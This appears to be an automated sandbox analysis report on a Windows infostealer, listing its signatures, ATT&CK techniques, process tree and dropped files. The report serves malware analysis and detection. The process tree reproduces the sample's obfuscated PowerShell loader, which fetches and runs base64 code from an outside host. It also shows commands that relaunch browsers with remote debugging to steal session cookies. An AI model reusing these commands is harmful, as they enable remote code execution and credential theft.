037289c207c8e229d728f247c2d7eb1459fb4413fcd4fe662f74c711169a1e08

Analysis

max time kernel
119s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
20/03/2025, 20:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

void/82231216bb55678a4bc192c1f0f180121ffc0a6278dcd1d6d9db8bea784ccf6b.exe
Size

214KB
MD5

369fb99dbae23164166f27bf37e6fef2
SHA1

2a039fcb0b93ba7a69c7428740b0a09cd3347f53
SHA256

82231216bb55678a4bc192c1f0f180121ffc0a6278dcd1d6d9db8bea784ccf6b
SHA512

f7e201c34ca4d1ed8720ef082085190fb5be81f3848c27a4f172eea0ab19f5cd876bc2b8f5157548e65c1834a542c35611c6e8adea957ce204494e5f38118058
SSDEEP

3072:QH4u04ZWd2RwqL908aj9OrNmm0eiZU++0dFAYIzwpbsN2t86dNvPW6nnH:QHb04ZWdzqp08aj9OOeBNzwpTVuUH

Score

8^/10

credential_access defense_evasion discovery execution spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	5984	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5984	powershell.exe
5984	powershell.exe

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
452	msedge.exe
3660	msedge.exe
2484	chrome.exe
1752	chrome.exe
3908	chrome.exe
5872	chrome.exe
2084	chrome.exe
3392	msedge.exe

Executes dropped EXE 1 IoCs

pid	Process
4472	app.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 7 IoCs

defense_evasion

pid	Process
5832	taskkill.exe
1940	taskkill.exe
1780	taskkill.exe
1860	taskkill.exe
1948	taskkill.exe
5680	taskkill.exe
4952	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133869758561847468"	chrome.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
5984	powershell.exe
5984	powershell.exe
4472	app.exe
4472	app.exe
4472	app.exe
4472	app.exe
2484	chrome.exe
2484	chrome.exe
2484	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
2484	chrome.exe
2484	chrome.exe
2484	chrome.exe
2484	chrome.exe
3392	msedge.exe
3392	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5984	powershell.exe
Token: SeIncreaseQuotaPrivilege	752	WMIC.exe
Token: SeSecurityPrivilege	752	WMIC.exe
Token: SeTakeOwnershipPrivilege	752	WMIC.exe
Token: SeLoadDriverPrivilege	752	WMIC.exe
Token: SeSystemProfilePrivilege	752	WMIC.exe
Token: SeSystemtimePrivilege	752	WMIC.exe
Token: SeProfSingleProcessPrivilege	752	WMIC.exe
Token: SeIncBasePriorityPrivilege	752	WMIC.exe
Token: SeCreatePagefilePrivilege	752	WMIC.exe
Token: SeBackupPrivilege	752	WMIC.exe
Token: SeRestorePrivilege	752	WMIC.exe
Token: SeShutdownPrivilege	752	WMIC.exe
Token: SeDebugPrivilege	752	WMIC.exe
Token: SeSystemEnvironmentPrivilege	752	WMIC.exe
Token: SeRemoteShutdownPrivilege	752	WMIC.exe
Token: SeUndockPrivilege	752	WMIC.exe
Token: SeManageVolumePrivilege	752	WMIC.exe
Token: 33	752	WMIC.exe
Token: 34	752	WMIC.exe
Token: 35	752	WMIC.exe
Token: 36	752	WMIC.exe
Token: SeIncreaseQuotaPrivilege	752	WMIC.exe
Token: SeSecurityPrivilege	752	WMIC.exe
Token: SeTakeOwnershipPrivilege	752	WMIC.exe
Token: SeLoadDriverPrivilege	752	WMIC.exe
Token: SeSystemProfilePrivilege	752	WMIC.exe
Token: SeSystemtimePrivilege	752	WMIC.exe
Token: SeProfSingleProcessPrivilege	752	WMIC.exe
Token: SeIncBasePriorityPrivilege	752	WMIC.exe
Token: SeCreatePagefilePrivilege	752	WMIC.exe
Token: SeBackupPrivilege	752	WMIC.exe
Token: SeRestorePrivilege	752	WMIC.exe
Token: SeShutdownPrivilege	752	WMIC.exe
Token: SeDebugPrivilege	752	WMIC.exe
Token: SeSystemEnvironmentPrivilege	752	WMIC.exe
Token: SeRemoteShutdownPrivilege	752	WMIC.exe
Token: SeUndockPrivilege	752	WMIC.exe
Token: SeManageVolumePrivilege	752	WMIC.exe
Token: 33	752	WMIC.exe
Token: 34	752	WMIC.exe
Token: 35	752	WMIC.exe
Token: 36	752	WMIC.exe
Token: SeDebugPrivilege	1860	taskkill.exe
Token: SeDebugPrivilege	1948	taskkill.exe
Token: SeShutdownPrivilege	2484	chrome.exe
Token: SeCreatePagefilePrivilege	2484	chrome.exe
Token: SeShutdownPrivilege	2484	chrome.exe
Token: SeCreatePagefilePrivilege	2484	chrome.exe
Token: SeShutdownPrivilege	2484	chrome.exe
Token: SeCreatePagefilePrivilege	2484	chrome.exe
Token: SeShutdownPrivilege	2484	chrome.exe
Token: SeCreatePagefilePrivilege	2484	chrome.exe
Token: SeShutdownPrivilege	2484	chrome.exe
Token: SeCreatePagefilePrivilege	2484	chrome.exe
Token: SeDebugPrivilege	5680	taskkill.exe
Token: SeDebugPrivilege	4952	taskkill.exe
Token: SeDebugPrivilege	5832	taskkill.exe
Token: SeDebugPrivilege	1940	taskkill.exe
Token: SeDebugPrivilege	1780	taskkill.exe
Token: SeIncreaseQuotaPrivilege	928	wmic.exe
Token: SeSecurityPrivilege	928	wmic.exe
Token: SeTakeOwnershipPrivilege	928	wmic.exe
Token: SeLoadDriverPrivilege	928	wmic.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2484	chrome.exe
3392	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1684 wrote to memory of 5984	1684	82231216bb55678a4bc192c1f0f180121ffc0a6278dcd1d6d9db8bea784ccf6b.exe	87
PID 1684 wrote to memory of 5984	1684	82231216bb55678a4bc192c1f0f180121ffc0a6278dcd1d6d9db8bea784ccf6b.exe	87
PID 5984 wrote to memory of 4472	5984	powershell.exe	91
PID 5984 wrote to memory of 4472	5984	powershell.exe	91
PID 4472 wrote to memory of 2908	4472	app.exe	92
PID 4472 wrote to memory of 2908	4472	app.exe	92
PID 2908 wrote to memory of 752	2908	cmd.exe	94
PID 2908 wrote to memory of 752	2908	cmd.exe	94
PID 4472 wrote to memory of 1860	4472	app.exe	95
PID 4472 wrote to memory of 1860	4472	app.exe	95
PID 4472 wrote to memory of 1948	4472	app.exe	97
PID 4472 wrote to memory of 1948	4472	app.exe	97
PID 4472 wrote to memory of 2484	4472	app.exe	99
PID 4472 wrote to memory of 2484	4472	app.exe	99
PID 2484 wrote to memory of 2224	2484	chrome.exe	100
PID 2484 wrote to memory of 2224	2484	chrome.exe	100
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 3060	2484	chrome.exe	101
PID 2484 wrote to memory of 1232	2484	chrome.exe	102
PID 2484 wrote to memory of 1232	2484	chrome.exe	102
PID 2484 wrote to memory of 4696	2484	chrome.exe	103
PID 2484 wrote to memory of 4696	2484	chrome.exe	103
PID 2484 wrote to memory of 4696	2484	chrome.exe	103
PID 2484 wrote to memory of 4696	2484	chrome.exe	103
PID 2484 wrote to memory of 4696	2484	chrome.exe	103
PID 2484 wrote to memory of 4696	2484	chrome.exe	103
PID 2484 wrote to memory of 4696	2484	chrome.exe	103
PID 2484 wrote to memory of 4696	2484	chrome.exe	103
PID 2484 wrote to memory of 4696	2484	chrome.exe	103
PID 2484 wrote to memory of 4696	2484	chrome.exe	103
PID 2484 wrote to memory of 4696	2484	chrome.exe	103
PID 2484 wrote to memory of 4696	2484	chrome.exe	103
PID 2484 wrote to memory of 4696	2484	chrome.exe	103
PID 2484 wrote to memory of 4696	2484	chrome.exe	103
PID 2484 wrote to memory of 4696	2484	chrome.exe	103
PID 2484 wrote to memory of 4696	2484	chrome.exe	103

C:\Users\Admin\AppData\Local\Temp\void\82231216bb55678a4bc192c1f0f180121ffc0a6278dcd1d6d9db8bea784ccf6b.exe
"C:\Users\Admin\AppData\Local\Temp\void\82231216bb55678a4bc192c1f0f180121ffc0a6278dcd1d6d9db8bea784ccf6b.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoP -NonI -ExecutionPolicy Bypass -Command " $mode='win-activate.'; $userAgent='gift-3.2'; $wallet='space'; $trading='/developer'; $AI='https://'; $developer=$AI+$mode+$wallet+$trading; $Response=Invoke-WebRequest -Uri $developer -UseBasicParsing -UserAgent $userAgent; $Content=$Response.Content; $t=$Content -replace '<[^>]*>', ''; $s=[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($t)); Invoke-Expression $s "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5984
- - C:\Users\Admin\AppData\Roaming\app.exe
    "C:\Users\Admin\AppData\Roaming\app.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4472
  - - C:\Windows\system32\cmd.exe
      "cmd" /C "wmic bios get manufacturer"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2908
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get manufacturer
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:752
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM brave.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1860
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM chrome.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1948
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\google\chrome\User Data"
      4⤵
      Uses browser remote debugging
      Checks processor information in registry
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2484
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\google\chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\google\chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\google\chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffae896dcf8,0x7ffae896dd04,0x7ffae896dd10
        5⤵
        
        PID:2224
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2024,i,6706046909779578506,15705538941393578395,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1980 /prefetch:2
        5⤵
        
        PID:3060
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --field-trial-handle=2244,i,6706046909779578506,15705538941393578395,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2240 /prefetch:3
        5⤵
        
        PID:1232
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --field-trial-handle=2468,i,6706046909779578506,15705538941393578395,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2464 /prefetch:8
        5⤵
        
        PID:4696
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3564,i,6706046909779578506,15705538941393578395,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3560 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5872
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3604,i,6706046909779578506,15705538941393578395,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3600 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1752
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4180,i,6706046909779578506,15705538941393578395,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4176 /prefetch:2
        5⤵
        Uses browser remote debugging
        
        PID:3908
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4644,i,6706046909779578506,15705538941393578395,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4640 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2084
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --field-trial-handle=5216,i,6706046909779578506,15705538941393578395,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4812 /prefetch:8
        5⤵
        
        PID:4012
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --field-trial-handle=5436,i,6706046909779578506,15705538941393578395,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5432 /prefetch:8
        5⤵
        
        PID:748
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM chrome.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5680
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM msedge.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4952
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:3392
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ffaca9bf208,0x7ffaca9bf214,0x7ffaca9bf220
        5⤵
        
        PID:1388
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2236,i,453606117100472747,16741877564157975704,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2232 /prefetch:3
        5⤵
        
        PID:616
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2204,i,453606117100472747,16741877564157975704,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:2
        5⤵
        
        PID:4476
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2540,i,453606117100472747,16741877564157975704,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:8
        5⤵
        
        PID:1508
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3764,i,453606117100472747,16741877564157975704,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3760 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3660
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3820,i,453606117100472747,16741877564157975704,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3816 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:452
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM msedge.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5832
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM opera.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1940
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM opera.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1780
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" process where name='Telegram.exe' get ExecutablePath
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:928
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /C del /F /Q "C:\Users\Admin\AppData\Roaming\app.exe"
      4⤵
      PID:3188

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4360

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Modify Authentication Process

T1556

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Authentication Process

T1556

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\fed60d43-3ad7-4c72-9d1b-31649c5772e3.tmp

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
06462f8e07be05cd5684c944e795136e

SHA1
af153356a558748d8e0e96fc4da939be4e13c120

SHA256
6ca409e24de7e60314249369b2e90aa5ab52b5b90621bad6825ed35877d8de0f

SHA512
b29e3eeef3d2ed4682a6db3b91389d07bfe3b7896cf3dc11ec9a383cdc125fa6c0695ca713c11291dd2c2517497c4c3dabe61762c60455241ebc99a9dbd67ecd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
65044109d1beb8ed8d59560642cbc519

SHA1
0084485b0aa26069232fab51ee603682e8edfd17

SHA256
a1e0b448218678b30356cbbe4092ea091435e7450822a9748361b6e8b198962d

SHA512
96dcc68fe92f98c4329a8335cfffdb0849a52562431045ccc42076bda0abf3842491303fb669246bfd04e64113688d3f90000a09571dd76ff84b52e34e45f9b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

Filesize
327B

MD5
6afad426cff93255b20861ea6e2033b1

SHA1
